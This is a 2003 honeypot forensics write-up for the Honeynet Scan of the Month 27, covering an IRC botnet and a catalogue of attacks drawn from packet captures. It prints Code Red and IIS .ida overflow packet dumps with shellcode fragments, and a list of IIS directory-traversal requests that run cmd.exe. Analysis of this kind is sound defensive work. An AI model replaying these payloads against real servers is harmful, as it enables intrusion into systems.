Scan of the Month 27

Nir Hauser

hauserns at georgetown dot edu

April 18, 2003

Tools:

Ethereal: http://www.ethereal.com/

Snort: http://www.snort.org/

A simple rules.txt file for Snort:

alert ip any any -> any any

output alert_fast: alert.fast

Running snort with this ruleset creates a file alert.fast that contains a summary of the network traffic. It also creates one directory for each TCP or UDP session of every IP address involved in the log. This is a powerful tool in combination with Ethereal.

Beginning Questions

1. What is IRC?

Internet Relay Chat (IRC) is system that allows multiple users to enter a chatroom and chat with one another. It is set up on a client/server architecture. IRC clients such as mIRC log in to the IRC server where they find multiple channels to join. IRC also allows for file transfer and other operations.

2. What message is sent by an IRC client when it asks to join an IRC network?

First, the IRC clients sends a TCP packet with the SYN flag to port 6667. The client and server then perform a handshake. This is what it looks like:

From Ethereal:

35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384

35795 414909.304675 209.196.44.172 172.16.134.191 TCP 6667 > 1152 [SYN, ACK] Seq=4266393801 Ack=4114925006 Win=32120

35796 414909.305433 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [ACK] Seq=4114925006 Ack=4266393802 Win=17520

The IRC client then sends an IRC packet requesting to use a nickname. Here is the message that the honeypot sends to the IRC server 209.196.44.172:

NICK rgdiuggac

USER rgdiuggac localhost localhost :rgdiuggac

The IRC client then sends a request to join a channel. Here is the message that the honeypot sends to the IRC server 209.196.44.172:

JOIN #xàéüîéðìx :sex0r

WHO rgdiuggac

Here the honeypot says it wants to join channel #xàéüîéðìx and it identifies itself as rgdiuggac.

3. What is a botnet?

A botnet is a collection of compromised computers that have joined an IRC channel. At first, a Trojan Horse is somehow installed on the compromised computers. That Trojan then proceeds to attempt to log on to an IRC server. Once it logs on to the appropriate channel it awaits a command. A botnet can consist of thousands of zombie computers that sit around and wait for an opportunity to do something malicious.

4. What are botnets commonly used for?

Botnets are always malicious. The users whose computers have logged onto the botnet are always unaware that their computers have done so. A botnet can command all of its zombies to begin a Distributed Denial of Service (DDoS) against a designated computer. It can also order each of its members to attack other computers, install the Trojan, and invite them into the botnet.

5. What TCP ports does IRC generally use?

IRC generally uses ports 6667 through 7000. In this Scan, IRC always uses port 6667.

6. What is a binary log file and how is one created?

A binary log file keeps track of all network traffic that passes through the host machine. It is created using a sniffer such as Snort which listens to all traffic on the network and records it in the binary file. Snort can then analyze the raw data and present it in a human readable form. Ethereal can read the binary log and present the data in a GUI. Once the log is loaded into Ethereal or Snort, filters can be applied to it in order to extract specific packets.

7. What IRC servers did the honeypot, which has the IP address 172.16.134.191, communicate with?

The honeypot attempted to log onto the following IRC servers:

66.33.65.58

63.241.174.144

217.199.175.10

209.126.161.29

209.196.44.172

as you can see from the following entries:

34821 412112.717027 172.16.134.191 209.126.161.29 TCP 1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0

35739 412630.079021 172.16.134.191 66.33.65.58 TCP 1129 > 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0

35745 413286.204510 172.16.134.191 63.241.174.144 TCP 1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0

35762 413307.053048 172.16.134.191 217.199.175.10 TCP 1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0

35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0

The honeypot successfully logs onto 209.196.44.172.

8. During the observation period, how many distinct hosts accessed the botnet associated with the server having IP address 209.196.44.172?

During the observation period, 6639 distinct hosts accessed the botnet associated with the server having IP address 209.196.44.172. This includes the hosts that were already logged in to 209.196.44.172 when the honeypot logged on. When an IRC client logs into a channel, the server tells it the names of all the users that are currently logged in. I counted this number. I then monitored all the IRC responses afterwards and used a script to get the usernames of all the IRC clients that interacted with the server. I added these two numbers to come to 6639.

9. Assuming that each botnet host has a 56 kbps network link, what is the aggregate bandwidth of the botnet?

56kbps x 6639 = 371784kbps = 371.784 Mbps

Intermediate Questions

1) What IP source addresses were used in attacking the honeypot?

The following IP Addresses were used in attacking the honeypot:

12.252.61.161

12.253.142.87

12.83.147.97

129.116.182.239

141.149.155.249

141.85.37.78

144.134.109.25

148.235.82.146

162.33.189.252

164.125.76.48

168.226.98.61

168.243.103.205

169.254.205.177

172.16.134.191

192.130.71.66

192.215.160.106

194.199.201.9

195.36.247.77

195.67.251.197

200.135.228.10

200.50.124.2

200.60.202.74

200.66.98.107

200.74.26.73

200.78.103.67

202.63.162.34

203.106.55.12

203.115.96.146

203.170.177.8

204.50.186.37-

205.180.159.35

206.149.148.192

207.6.77.235

208.186.61.2-

209.45.125.110

209.45.125.69

210.111.56.66

210.12.211.121

210.203.189.77

210.214.49.227

210.22.204.101

210.58.0.25

211.149.57.197

212.110.30.110

212.122.20.74

212.162.165.18

212.243.23.179

213.107.105.72

213.116.166.126

213.122.77.74

213.170.56.83

213.217.55.243

213.23.49.158

213.44.104.92

213.7.60.57

213.84.75.42

216.170.214.226

216.192.145.21

216.228.8.158

216.229.73.11

217.1.35.169

217.222.201.82

217.227.245.101

217.227.98.82

217.35.65.9

218.163.9.89

218.237.70.119

218.244.66.32

218.25.147.83

218.4.48.74

218.4.65.115

218.4.87.137

218.4.99.237

218.87.178.167

218.92.13.142

219.118.31.42

219.145.211.132

219.145.211.3

219.65.37.37

219.94.46.57

24.107.117.237

24.161.196.103

24.167.221.106

24.197.194.106

24.74.199.104

4.33.244.44

4.64.221.42

61.11.11.54

61.111.101.78

61.132.88.50

61.132.88.90

61.134.45.19

61.14.66.92

61.140.149.137

61.150.120.72

61.150.72.7

61.155.126.150

61.177.154.228

61.177.56.98

61.177.62.66

61.185.212.166

61.185.215.42

61.185.242.190

61.185.29.9

61.203.104.148

61.55.71.169

61.8.1.64

62.127.38.198

62.150.170.134

62.150.170.232

62.194.4.114

62.201.96.159

62.251.129.118

64.17.250.240

64.254.203.68

66.139.10.15

66.190.67.122

66.233.4.225

66.73.160.240

66.8.163.125

66.81.131.17

66.92.135.108

67.201.75.38

67.81.161.166

68.115.33.110

68.152.53.138

68.154.11.82

68.169.174.108

68.37.54.69

68.45.123.130

68.84.210.227

80.181.116.202

81.114.77.37

81.202.125.5

81.50.177.167

81.57.217.208

2. What vulnerabilities did attackers attempt to exploit?

Windows 2000 NetBIOS Vulnerabilities

Windows uses Server Message Block (SMB) to allow client applications to read / writes to files on the server and request services. Before Windows 2000, the only way to issue SMB commands was to connect to ports 137, 138, or 139 on the Windows machine and communicate over NetBIOS. Windows 2000 allows a client to issue SMB commands without the NetBIOS through a TCP/IP connection on port 445. When a client wishes to communicate with SMB on a Windows 2000 machine, it usually sends the request to ports 139 and 445. If port 445 responds, the client proceeds to communicate over that port. Otherwise, only port 137 is used. This information is useful, because if an attacker queries port 137 but ignores port 445, it might mean that the attacker thinks it is dealing with a version of Windows older than Windows 2000.

Attackers attempted to connect to the honeypot through the NetBIOS. The NetBIOS is used by Windows machines to communicate over a LAN. File and printer sharing is done using SMB commands over NetBIOS. Many attackers issued a query to the honeypot’s NetBIOS. Once such query looked like this:

1 0.000000 219.118.31.42 172.16.134.191 NBNS Name query NBSTAT *<00><00><00><00><00><00><00><00><00><00><00><00><00><00><00>

Some attackers attempted to map to the honeypot’s C drive through the NetBIOS. This is generally the command used in previous versions of Windows, for this reason, none of these succeeded. That query looked like this:

8 0.514274 219.118.31.42 172.16.134.191 SMB Tree Connect AndX Request, Path: \\PC0191\C

Some attackers attempted to connect to honeypot’s IPC$ Share. The IPC$ share is also accessed through SMB. Clients can use the IPC$ Share to send commands to the server. Once an attacker logs into the IPC$ share he can issue Remote Procedure Calls (RPC). RPC is a client/server infrastructure that allows a client to issue commands to the server through a programmer’s interface. Because the Administrator password on the honeypot is NULL, an attacker can log in with full Administrator privileges. The query looks like this:

925 322205.478544 210.22.204.101 172.16.134.191 SMB Tree Connect AndX Request, Path: \\172.16.134.191\IPC$

W32.HLLW.Deloder Worm

61.111.101.78 attacks the honeypot with the W32.HLLW.Deloder worm. The worm connects to the honeypot’s IPC$ share as described earlier. It then attempts a series of passwords including the NULL password. Once it connects, it installs a Trojan Backdoor called INST.EXE. It also extracts the legitimate system utility PSEXESVC.EXE by SysInternals on the victim’s computer. We can see that the Deloder installs PSEXESVC.EXE and INST.EXE in the following packets:

33280 412046.012158 61.111.101.78 172.16.134.191 SMB NT Create AndX Request, Path: \System32\PSEXESVC.EXE

33678 412072.276580 61.111.101.78 172.16.134.191 SMB NT Create AndX Request, Path: \System32\inst.exe

When we see these packets, we recognize the signature of the Deloder Worm.

Code Red Worm

Code Red is a self-propagating malicious worm that exploits a buffer overflow in IIS. First, 68.169.174.108 scanned the honeypot to see if it has IIS and is vulnerable to Code Red. We can tell that it is most likey the Retina Code Red Scanner because it issues the following query to IIS:

GET /pagerror.gif HTTP/1.1\r\n

In the packet ?

65 28542.955886 68.169.174.108 172.16.134.191 HTTP GET /pagerror.gif HTTP/1.1

218.25.147.83 later begins a Code Red attack against IIS running on the honeypot. Code Red uses a buffer overflow to break IIS. It sends the following four HTTP packets.

32885 396968.463209 218.25.147.83 172.16.134.191 HTTP GET

0000 00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00 ..i...........E.

0010 05 d4 02 b0 40 00 6e 06 6d dc da 19 93 53 ac 10 ....@.n.m....S..

0020 86 bf 0e 32 00 50 94 47 ec 82 e7 ec 78 a8 50 18 ...2.P.G....x.P.

0030 44 10 75 2d 00 00 2f 64 65 66 61 75 6c 74 2e 69 D.u-../default.i

0040 64 61 3f 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e da?NNNNNNNNNNNNN

0050 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

0060 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

0070 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

0080 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

0090 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

00a0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

00b0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

00c0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

00d0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

00e0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

00f0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

0100 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

0110 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN

0120 4e 4e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 NNN.............

0130 00 00 c3 03 00 00 00 78 00 fa 20 20 48 54 54 50 .......x.. HTTP

0140 2f 31 2e 30 0d 0a 38 25 75 63 62 64 33 25 75 37 /1.0..8%ucbd3%u7

0150 38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25 801%u9090%u6858%

0160 75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39 ucbd3%u7801%u909

0170 30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30 0%u9090%u8190%u0

0180 30 63 33 25 75 30 30 30 33 25 75 38 62 30 30 25 0c3%u0003%u8b00%

0190 75 35 33 31 62 25 75 35 33 66 66 25 75 30 30 37 u531b%u53ff%u007

01a0 38 25 75 30 30 30 30 25 75 30 30 3d 61 20 20 48 8%u0000%u00=a H

01b0 54 54 50 2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 TTP/1.0..Content

01c0 2d 74 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a -type: text/xml.

01d0 48 4f 53 54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f HOST:www.worm.co

01e0 6d 0a 20 41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43 m. Accept: */*.C

01f0 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33 ontent-length: 3

0200 35 36 39 20 0d 0a 0d 0a 55 8b ec 81 ec 18 02 00 569 ....U.......

0210 00 53 56 57 8d bd e8 fd ff ff b9 86 00 00 00 b8 .SVW............

0220 cc cc cc cc f3 ab c7 85 70 fe ff ff 00 00 00 00 ........p.......

etc ...

32886 396968.482227 218.25.147.83 172.16.134.191 HTTP Continuation

(hex is not important for this packet)

32888 396969.003930 218.25.147.83 172.16.134.191 HTTP Continuation

0000 00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00 ..i...........E.

0010 04 93 02 b5 40 00 6e 06 6f 18 da 19 93 53 ac 10 ....@.n.o....S..

0020 86 bf 0e 32 00 50 94 47 f7 da e7 ec 78 a8 50 18 ...2.P.G....x.P.

0030 44 10 de 1f 00 00 ff ff 8b 85 4c fe ff ff 83 c0 D.........L.....

0040 01 89 85 4c fe ff ff 8b 8d 64 fe ff ff 0f be 11 ...L.....d......

0050 85 d2 74 02 eb d3 8b f4 6a 00 8b 85 4c fe ff ff ..t.....j...L...

0060 50 8b 4d 08 8b 51 64 52 8b 85 78 fe ff ff 50 ff P.M..QdR..x...P.

0070 95 c0 fe ff ff 3b f4 90 43 4b 43 4b c7 85 4c fe .....;..CKCK..L.

0080 ff ff 00 00 00 00 8b 8d 68 fe ff ff 83 c1 07 89 ........h.......

0090 8d 64 fe ff ff eb 1e 8b 95 64 fe ff ff 83 c2 01 .d.......d......

00a0 89 95 64 fe ff ff 8b 85 4c fe ff ff 83 c0 01 89 ..d.....L.......

00b0 85 4c fe ff ff 8b 8d 64 fe ff ff 0f be 11 85 d2 .L.....d........

00c0 74 02 eb d3 8b f4 6a 00 8b 85 4c fe ff ff 50 8b t.....j...L...P.

00d0 8d 68 fe ff ff 83 c1 07 51 8b 95 78 fe ff ff 52 .h......Q..x...R

00e0 ff 95 c0 fe ff ff 3b f4 90 43 4b 43 4b 8b 45 08 ......;..CKCK.E.

00f0 8b 48 70 89 8d 4c fe ff ff 8b f4 6a 00 8b 95 4c .Hp..L.....j...L

0100 fe ff ff 52 8b 45 08 8b 48 78 51 8b 95 78 fe ff ...R.E..HxQ..x..

0110 ff 52 ff 95 c0 fe ff ff 3b f4 90 43 4b 43 4b c6 .R......;..CKCK.

0120 85 fc fe ff ff 00 8b f4 6a 00 68 00 01 00 00 8d ........j.h.....

0130 85 fc fe ff ff 50 8b 8d 78 fe ff ff 51 ff 95 c4 .....P..x...Q...

0140 fe ff ff 3b f4 90 43 4b 43 4b 89 85 4c fe ff ff ...;..CKCK..L...

0150 8b f4 8b 95 78 fe ff ff 52 ff 95 c8 fe ff ff 3b ....x...R......;

0160 f4 90 43 4b 43 4b e9 0c fb ff ff eb fe e8 8c f5 ..CKCK..........

0170 ff ff eb 30 58 83 c0 05 55 57 53 56 50 6a 3c 8b ...0X...UWSVPj<.

0180 f0 83 c6 0c 56 68 00 01 00 00 ff 70 08 ff 74 24 ....Vh.....p..t$

0190 28 ff 10 58 50 ff 74 24 18 ff 50 04 58 5e 5b 5f (..XP.t$..P.X^[_

01a0 5d ff 20 90 e8 cb ff ff ff e8 7b f9 ff ff d0 f2 ]. .......{.....

01b0 27 6e f5 18 03 75 4b 3c 43 00 00 01 00 00 78 56 'n...uK<C.....xV

01c0 34 12 b8 78 56 34 12 58 50 8b bd 68 fe ff ff 89 4..xV4.XP..h....

01d0 47 f2 c3 8b 44 24 0c 05 b8 00 00 00 c7 00 4a ff G...D$........J.

01e0 46 00 33 c0 c3 eb ec e8 f1 f4 ff ff 4c 6f 61 64 F.3.........Load

01f0 4c 69 62 72 61 72 79 41 00 47 65 74 53 79 73 74 LibraryA.GetSyst

0200 65 6d 54 69 6d 65 00 43 72 65 61 74 65 54 68 72 emTime.CreateThr

0210 65 61 64 00 43 72 65 61 74 65 46 69 6c 65 41 00 ead.CreateFileA.

0220 53 6c 65 65 70 00 47 65 74 53 79 73 74 65 6d 44 Sleep.GetSystemD

0230 65 66 61 75 6c 74 4c 61 6e 67 49 44 00 56 69 72 efaultLangID.Vir

0240 74 75 61 6c 50 72 6f 74 65 63 74 00 09 69 6e 66 tualProtect..inf

0250 6f 63 6f 6d 6d 2e 64 6c 6c 00 54 63 70 53 6f 63 ocomm.dll.TcpSoc

0260 6b 53 65 6e 64 00 09 57 53 32 5f 33 32 2e 64 6c kSend..WS2_32.dl

0270 6c 00 73 6f 63 6b 65 74 00 63 6f 6e 6e 65 63 74 l.socket.connect

0280 00 73 65 6e 64 00 72 65 63 76 00 63 6c 6f 73 65 .send.recv.close

0290 73 6f 63 6b 65 74 00 09 77 33 73 76 63 2e 64 6c socket..w3svc.dl

02a0 6c 00 00 47 45 54 20 00 3f 00 20 20 48 54 54 50 l..GET .?. HTTP

02b0 2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 /1.0..Content-ty

02c0 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a 48 4f 53 pe: text/xml.HOS

02d0 54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f 6d 0a 20 T:www.worm.com.

02e0 41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43 6f 6e 74 Accept: */*.Cont

02f0 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33 35 36 39 ent-length: 3569

0300 20 0d 0a 0d 0a 00 63 3a 5c 6e 6f 74 77 6f 72 6d .....c:\notworm

0310 00 4c 4d 54 48 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 .LMTH..<html><he

0320 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 ad><meta http-eq

0330 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 uiv="Content-Typ

0340 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 e" content="text

0350 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 /html; charset=e

0360 6e 67 6c 69 73 68 22 3e 3c 74 69 74 6c 65 3e 48 nglish"><title>H

0370 45 4c 4c 4f 21 3c 2f 74 69 74 6c 65 3e 3c 2f 68 ELLO!</title></h

0380 65 61 64 3e 3c 62 61 64 79 3e 3c 68 72 20 73 69 ead><bady><hr si

0390 7a 65 3d 35 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 ze=5><font color

03a0 3d 22 72 65 64 22 3e 3c 70 20 61 6c 69 67 6e 3d ="red"><p align=

03b0 22 63 65 6e 74 65 72 22 3e 57 65 6c 63 6f 6d 65 "center">Welcome

03c0 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 to http://www.w

03d0 6f 72 6d 2e 63 6f 6d 20 21 3c 62 72 3e 3c 62 72 orm.com !<br><br

03e0 3e 48 61 63 6b 65 64 20 42 79 20 43 68 69 6e 65 >Hacked By Chine

03f0 73 65 21 3c 2f 66 6f 6e 74 3e 3c 2f 68 72 3e 3c se!</font></hr><

0400 2f 62 61 64 79 3e 3c 2f 68 74 6d 6c 3e 20 20 20 /bady></html>

0410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

0420 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

0430 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

0440 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

0450 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

0460 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

0470 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

0480 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

0490 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

04a0 20

32889 396969.032378 218.25.147.83 172.16.134.191 HTTP Continuation

(hex is not important for this packet)

The signature of the Code Red worm can be seen at the end of the third packet. It displays the following HTML message to the victim:

<html><head><meta http-equiv="Content-Type" content="text/html;

charset=English"><title>HELLO!</title></head><bady><hr size=5><font

color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked

By Chinese!</font></hr></bady></html>

Other IIS Buffer Overflows

210.22.204.101 and 24.197.194.106 attempt to exploit IIS vulnerability using a buffer overflow. The following two packets demonstrate 210.22.204.101’s attack: (Notice that the last few lines of the second packet, the attacker attempts to run cmd.exe. This is the Windows command prompt)

1839 322275.638746 210.22.204.101 172.16.134.191 HTTP GET

/NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

0000 00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00 ..i...........E.

0010 05 dc 6b 08 40 00 6b 06 d7 6c d2 16 cc 65 ac 10 ..k.@.k..l...e..

0020 86 bf 06 8e 00 50 76 16 a7 9e 8b 5a 44 20 50 10 .....Pv....ZD P.

0030 fa f0 f3 19 00 00 47 45 54 20 2f 4e 55 4c 4c 2e ......GET /NULL.

0040 49 44 41 3f 43 43 43 43 43 43 43 43 43 43 43 43 IDA?CCCCCCCCCCCC

0050 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

0060 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

0070 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

0080 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

0090 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

00a0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

00b0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

00c0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

00d0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

00e0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

00f0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

0100 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

0110 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC

0120 43 43 43 43 43 43 43 43 43 43 43 43 25 75 30 61 CCCCCCCCCCCC%u0a

0130 65 62 25 75 62 38 39 30 25 75 64 61 63 66 25 75 eb%ub890%udacf%u

0140 37 37 65 65 25 75 30 30 30 30 25 75 30 30 30 30 77ee%u0000%u0000

0150 25 75 38 33 38 62 25 75 30 30 39 34 25 75 30 30 %u838b%u0094%u00

0160 30 30 25 75 34 30 38 62 25 75 30 35 36 34 25 75 00%u408b%u0564%u

0170 30 31 35 30 25 75 30 30 30 30 25 75 65 30 66 66 0150%u0000%ue0ff

0180 25 75 39 30 39 30 3d 78 26 90 90 90 90 90 90 90 %u9090=x&.......

0190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

etc...

1840 322275.638746 210.22.204.101 172.16.134.191 HTTP Continuation

abbreviated hex ...

0250 c9 eb f6 fa d8 fd fd eb fc ea ea 99 ea eb 7f ee ................

0260 a8 e9 7f ee 99 fa 5e f2 f8 26 63 6d 64 2e 65 78 ......^..&cmd.ex

0270 65 24 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 e$ HTTP/1.1..Hos

0280 74 3a 20 31 37 32 2e 31 36 2e 31 33 34 2e 31 39 t: 172.16.134.19

0290 31 3a 38 30 0d 0a 0d 0a 1:80....

Directory Traversing Vulnernability

24.197.194.106 also attempted to tranverse the honeypot’s directories through IIS. Here a few examples of the HTTP it issued:

HEAD /script/..\../..\../..\../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir /system32/cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n

HEAD /scripts/..%\../..%\../..%\../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/..%\../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n

HEAD /scripts/..\../..\../..\winnt/system32/cmd.exe?/c+dir c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/..\../winnt/system32/cmd.exe?/c+dir r +dir HTTP/1.0\n

HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir +dir HTTP/1.0\n

Notice that the attacker was attempted to access cmd.exe. This is the Windows Command Prompt that would allow the hacker to execute commands on the Honeypot.

FX-Scanner

The attack on the honeypot is a variant of the FX-Scanner. The malicious program:

Sends a ping (ICMP)

Accesses port 80 (HTTP)

Accesses port 57 (no service is known for this port)

Accesses port 21 (FTP)

A series of different IP addresses: 192.130.71.66, 213.23.49.158, 141.85.37.78, 203.170.177.8 aroused suspicion that at FX-Scanner-like program was being used. There are no known services offered on port 57. Yet both 192.130.71.66 and 213.23.49.158 sent the honeypot packets on port 57 and port 80. 141.85.37.78 and 203.170.177.8 both sent the honeypot packets attempting to connect to FTP on port 21. The honeypot did not receive a Ping. I suspect that all these IP addresses were coordinated under one attack, but there is no way to know for sure. It is possible that they were isolated incidents.

DameWare Remote Control Agent Vulnerability

210.22.204.101 also scans DameWare Remote Control on port 6129. It sends the following packet attempting to connect with the port:

2052 322422.446563 210.22.204.101 172.16.134.191 TCP 3870 > 6129 [SYN] Seq=2495283602 Ack=0 Win=64240 Len=0

Microsoft SQL Server Vulnerability

Many attackers attempted to connect to the honeypot on port 1433 looking for Microsoft SQL Server. The query looked like this:

43 21871.711441 210.111.56.66 172.16.134.191 TCP 1929 > ms-sql-s [SYN] Seq=786885643 Ack=0 Win=64240 Len=0

The attackers were most likely attempted to spread the Microsoft SQLslammer worm. On Saturday, January 26, 2003, the worm shut down a large part of the Internet. It uses a buffer overflow to break into MS SQL-Server. Once it infects the host, it sends copies of itself out throughout the Internet.

rpc.statd Vulnerability

A few attackers attempted to connect to the honeypot on port 111 looking for rpc.statd. The rpc.statd program has an input validation problem which allows an attacker to exploit it. This program is installed by default in Linux machines. This is what the packet looked like:

246 146489.407148 204.50.186.37 172.16.134.191 TCP 4069 > sunrpc [SYN] Seq=2674258792 Ack=0 Win=32120 Len=0

Hack´a´Tack

A few attackers sent the honeypot UDP packets on port 28431. That port is susceptible to the Hack´a´Tack virus which attacks which includes Remote Access, a keylogger, an IP scanner, and also steals passwords. This is what the packet looked like:

10 6750.116690 62.150.170.134 172.16.134.191 UDP Source port: 28432 Destination port: 28431

SOCKS Vulnerability

A few attackers attempted to connect to the honeypot on port 1080 looking for the SOCKS proxy service. Hackers often use it to bounce packets off of it and attack a third party while it looks like the packets are coming from the victim, not the attacker. This is what the packet looked like:

162 98205.654304 200.74.26.73 172.16.134.191 TCP 25590 > 1080 [SYN] Seq=410779648 Ack=0 Win=512 Len=0

Who Did What? A list of attempted attacks

Windows 2000 NetBIOS vulnerabilities.

The following IP source addresses accessed ports 137, 139, or 455 in an attempt to exploit the NetBIOS and SMB:

129.116.182.239

141.149.155.249

144.134.109.25

148.235.82.146

162.33.189.252

164.125.76.48

168.226.98.61

169.254.205.177

172.168.0.154

195.36.247.77

195.67.251.197

200.60.202.74

200.66.98.107

200.78.103.67

202.63.162.34

203.106.55.12

203.115.96.146

207.6.77.235

208.186.61.2

209.45.125.69

209.45.125.110

210.12.211.121

210.203.189.77

210.214.49.227

210.58.0.25

211.149.57.197

212.110.30.110

13.107.105.72

213.116.166.126

213.217.55.243

213.44.104.92

213.7.60.57

213.84.75.42

216.170.214.226

216.228.8.158

217.1.35.169

217.222.201.82

217.227.245.101

217.227.98.82

218.163.9.89

218.237.70.119

218.87.178.167

219.118.31.42

219.65.37.37

219.94.46.57

24.107.117.237

24.161.196.103

4.64.221.42

61.11.11.54

61.111.101.78

61.14.66.92

61.140.149.137

61.155.126.150

61.177.154.228

61.55.71.169

62.127.38.198

62.194.4.114

62.201.96.159

62.251.129.118

64.17.250.240

64.254.203.68

66.139.10.15

66.190.67.122

66.73.160.240

66.8.163.125

66.92.135.108

68.115.33.110

